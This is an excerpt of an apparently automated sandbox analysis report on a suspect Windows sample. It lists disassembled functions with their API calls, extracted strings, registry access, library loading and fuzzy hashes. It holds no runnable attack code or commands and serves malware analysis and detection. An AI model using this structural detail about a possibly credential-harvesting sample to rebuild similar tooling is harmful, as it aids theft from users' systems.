                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                            Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: gj
                                                            • API String ID: 438689982-4203073231
                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                            Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                            • API String ID: 3510742995-2446657581
                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                            Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                            • memset.MSVCRT ref: 00405ABB
                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                            • SetFocus.USER32(?), ref: 00405B76
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$FocusItemmemset
                                                            • String ID:
                                                            • API String ID: 4281309102-0
                                                            • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                            • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                            Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfwcscat
                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                            • API String ID: 384018552-4153097237
                                                            • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                            • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                            Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                            • String ID: 0$6
                                                            • API String ID: 2029023288-3849865405
                                                            • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                            • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                            Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                            • memset.MSVCRT ref: 00405455
                                                            • memset.MSVCRT ref: 0040546C
                                                            • memset.MSVCRT ref: 00405483
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy$ErrorLast
                                                            • String ID: 6$\
                                                            • API String ID: 404372293-1284684873
                                                            • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                            • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                            Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                            • wcscpy.MSVCRT ref: 0040A107
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                            • String ID:
                                                            • API String ID: 1331804452-0
                                                            • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                            • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                            Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2012295524-4050573280
                                                            • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                            • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                            Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • <%s>, xrefs: 004100A6
                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf
                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                            • API String ID: 3473751417-2880344631
                                                            • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                            • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                            Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscat$_snwprintfmemset
                                                            • String ID: %2.2X
                                                            • API String ID: 2521778956-791839006
                                                            • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                            • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                            Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfwcscpy
                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                            • API String ID: 999028693-502967061
                                                            • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                            • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                            Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.MSVCRT ref: 00408DFA
                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                            • memset.MSVCRT ref: 00408E46
                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memsetstrlen
                                                            • String ID:
                                                            • API String ID: 2350177629-0
                                                            • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                            • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                            Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                            • API String ID: 2221118986-1606337402
                                                            • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                            • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                            Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                            • memset.MSVCRT ref: 00408FD4
                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                            • memset.MSVCRT ref: 00409042
                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                            • String ID:
                                                            • API String ID: 265355444-0
                                                            • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                            • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                            Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                            • memset.MSVCRT ref: 0040C439
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            • memset.MSVCRT ref: 0040C4D0
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                            • String ID:
                                                            • API String ID: 4131475296-0
                                                            • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                            • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                            Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004116FF
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                            • API String ID: 2618321458-3614832568
                                                            • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                            • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                            Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
